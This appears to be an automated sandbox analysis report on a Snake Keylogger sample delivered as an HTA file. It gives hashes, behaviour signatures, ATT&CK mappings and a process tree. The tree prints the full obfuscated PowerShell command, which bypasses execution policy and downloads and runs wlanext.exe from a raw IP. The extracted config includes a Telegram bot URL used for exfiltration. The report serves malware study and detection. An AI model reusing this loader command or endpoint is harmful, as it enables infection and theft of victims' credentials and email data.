snakekeylogger | 80b9bfa671f8626c76da94f0f39a03987278bd32e40851068a399bc69a4e05ca

Analysis

max time kernel
22s
max time network
122s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
23-10-2024 06:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greatthingswithgreatideasgivenmerestthignstgood.hta
Size

130KB
MD5

b507badbce69dc67d803b7f3b1385036
SHA1

b15c7634732a783b64414505ac4a5c095405f886
SHA256

80b9bfa671f8626c76da94f0f39a03987278bd32e40851068a399bc69a4e05ca
SHA512

a844a487906193c9265b67d7f3b1b617de3f227c205e043a1238cca7dbb9c1782480b001bd68de97cc86597e13205466bd433771b681d9b64bb4404f67f1abd3
SSDEEP

96:Eam7xBVS9Mrv6VS9qrvpDCFl/Aoy58VS9sVS9QSrvdVS967T:Ea2xBQ9Gv6Q9wvaoiQ9sQ9QIvdQ9QT

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

https://api.telegram.org/bot8129252196:AAFb_vUYwennKVolbwpXf3vnDfT_yhozHns/sendMessage?chat_id=7004340450

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 3 IoCs

resource	yara_rule
behavioral1/memory/3020-43-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/3020-45-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/3020-44-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2876	POWershEll.EXe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2876	POWershEll.EXe
3036	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2088	wlanext.exe

Loads dropped DLL 1 IoCs

pid	Process
2876	POWershEll.EXe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000b000000016d64-35.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2088 set thread context of 3020	2088	wlanext.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wlanext.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWershEll.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2876	POWershEll.EXe
3036	powershell.exe
2876	POWershEll.EXe
2876	POWershEll.EXe
3020	RegSvcs.exe
3020	RegSvcs.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2088	wlanext.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	POWershEll.EXe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	3020	RegSvcs.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2088	wlanext.exe
2088	wlanext.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2088	wlanext.exe
2088	wlanext.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 2876	2164	mshta.exe	29
PID 2164 wrote to memory of 2876	2164	mshta.exe	29
PID 2164 wrote to memory of 2876	2164	mshta.exe	29
PID 2164 wrote to memory of 2876	2164	mshta.exe	29
PID 2876 wrote to memory of 3036	2876	POWershEll.EXe	31
PID 2876 wrote to memory of 3036	2876	POWershEll.EXe	31
PID 2876 wrote to memory of 3036	2876	POWershEll.EXe	31
PID 2876 wrote to memory of 3036	2876	POWershEll.EXe	31
PID 2876 wrote to memory of 2728	2876	POWershEll.EXe	32
PID 2876 wrote to memory of 2728	2876	POWershEll.EXe	32
PID 2876 wrote to memory of 2728	2876	POWershEll.EXe	32
PID 2876 wrote to memory of 2728	2876	POWershEll.EXe	32
PID 2728 wrote to memory of 2852	2728	csc.exe	33
PID 2728 wrote to memory of 2852	2728	csc.exe	33
PID 2728 wrote to memory of 2852	2728	csc.exe	33
PID 2728 wrote to memory of 2852	2728	csc.exe	33
PID 2876 wrote to memory of 2088	2876	POWershEll.EXe	35
PID 2876 wrote to memory of 2088	2876	POWershEll.EXe	35
PID 2876 wrote to memory of 2088	2876	POWershEll.EXe	35
PID 2876 wrote to memory of 2088	2876	POWershEll.EXe	35
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36
PID 2088 wrote to memory of 3020	2088	wlanext.exe	36

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithgreatideasgivenmerestthignstgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2164
- C:\Windows\SysWOW64\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe
  "C:\Windows\SystEM32\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe" "pOwERsHell.eXe -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt ; ieX($(IEX('[syStem.teXt.encoDiNG]'+[ChAr]0X3A+[chAr]58+'UTf8.geTSTriNG([SysteM.cOnVeRt]'+[ChaR]0X3a+[cHAR]58+'FRoMbasE64STRiNg('+[CHaR]34+'JFNUVUdrR1YgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyRGVGaW5pdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbXBULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV01mQlhnZEssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1V0bW1tZ1lxb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreUh1S0wpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia0pUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FU1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTVFVHa0dWOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTcwL3dsYW5leHQuZXhlIiwiJGVudjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUYVJ0LXNMZWVQKDMpO3N0QXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3036
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ujexsr_l.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFCC7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFCC6.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2852
- - C:\Users\Admin\AppData\Roaming\wlanext.exe
    "C:\Users\Admin\AppData\Roaming\wlanext.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Roaming\wlanext.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:3020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFCC7.tmp

Filesize
1KB

MD5
5f817c868e5ec3c446d2fc7ad61690e7

SHA1
ff3da623c179964f946ddeed72954361024a3db9

SHA256
34fb599eca1ef79d95008f727b7fef8a279cf35c496da03e1105aaed404e3b0c

SHA512
827228d8c8a02484a68f639ca80ff768bd62cc1ebb5335503d36e24b9f82866756cd9bb862e818f6df718201e2625a425d1c7f91ff9b213a4c3cf15e9cbb0eeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ujexsr_l.dll

Filesize
3KB

MD5
fa6762da70694ca52aba425dc3661aeb

SHA1
a317d76b3b61380254c89342317f9c705b24e426

SHA256
388f73f3afb4ea7b5ae124c9722776018992bed24a318e52a49d27f99a4cea90

SHA512
5773359478f04f9d588e27b34dcb53bf176dba4467ef8e634f882f4928434b864205e100ffcb18386316b6fdf751345e92de80b55e2c8691a7b49a3e6cf66258

Download Submit
C:\Users\Admin\AppData\Local\Temp\ujexsr_l.pdb

Filesize
7KB

MD5
8c3aceab3b445c16fb74b0911f09b97f

SHA1
c3e4b75589351aab390445264b8220ff135c597b

SHA256
d78aa0d3a2a2be288d9a3cc50f87dd400058da420409eddc938d4aa32cfd83e7

SHA512
f2b0345359d730300b59357f181b9115a778103b4410a67386b2af8e1d4c45ae211e7d52260c1018eb8b9feeb56adc04a1765748ff52b3899f3aa6946f46269e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d9bda81a1f691134265ee531605d6e2e

SHA1
1fac2069ab151c1b2889325b967533e7e9812c4c

SHA256
ea5703b433dd4cea1988aca8619ba95bbda20a1e660e6f2b6c47ffc56b950742

SHA512
20420256a562b151ae70e0c03e91ce991c626d31b9f1a1adc7754fe3a1f4185ca8a3905a874dbdcc982c5ac662f60442a62ff105ac20921125f873f101151625

Download Submit
C:\Users\Admin\AppData\Roaming\wlanext.exe

Filesize
921KB

MD5
a019a791761f4d9afb7320f65bb6d925

SHA1
ce010189dfcf3a620732522aa44404f2fbc6a9f4

SHA256
3648d3be908fd29aa493de57b767ba8c192f703ae416624b6b722733928cb5aa

SHA512
f81cace2ed94a84899f5812a4e3bde6149f393dde6eba4d1fb06b1493af20114dd05e6cdbef98bfe960b6643d8814bc66345ee76b755b102edfabf436f5cf4a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFCC6.tmp

Filesize
652B

MD5
252f83a2027872ff6940ee8b515efeef

SHA1
fc2c61d98edae95c3994bfb40c13e002c1558911

SHA256
9e748c26332607bf164d942b8cb8260b69a3258ec73eb0b8ba795cf5f81e581a

SHA512
77e376aacd585c3df3d348eb498893733710e4bb65238707d8eaef51bf55d546c227084fa89eff58f0f27853f4b934df0180d809abbdd849d7a68a32e8d15e18

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ujexsr_l.0.cs

Filesize
467B

MD5
bebfacc2d07a38d08e81ee839f88d2e7

SHA1
8330fe9e223ac4d1084c4518273c8c68f4edfcd6

SHA256
c1be21408fe017c39fccef19dcd8c332c6985209103fc5a0682b7780aaf34e1d

SHA512
6d645019b48739f665ec479e237c4f64a9e42bda04ad0df0b458e168e762f44740bca8782e70767207c5e327c5d6d206b56e1c3789c45ca592332251aab8b8cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ujexsr_l.cmdline

Filesize
309B

MD5
f906d48edc249b5af0b720ad9c2bd777

SHA1
fba11807759e561b1ae99c1fc49e9dc933c9a758

SHA256
ef240ab9913de19237e04f04f28a7e40cc108ec1e003f2c0d8154c2a63e10540

SHA512
5edc5239b4368d05522c2e8e659985cdb7d24179ad2f785417bdbe526108c577b1fca010afbc3f53debb2fea4d975bd6a9735ac0be7775fb8742a208118cd6da

Download Submit
memory/3020-43-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/3020-45-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/3020-44-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download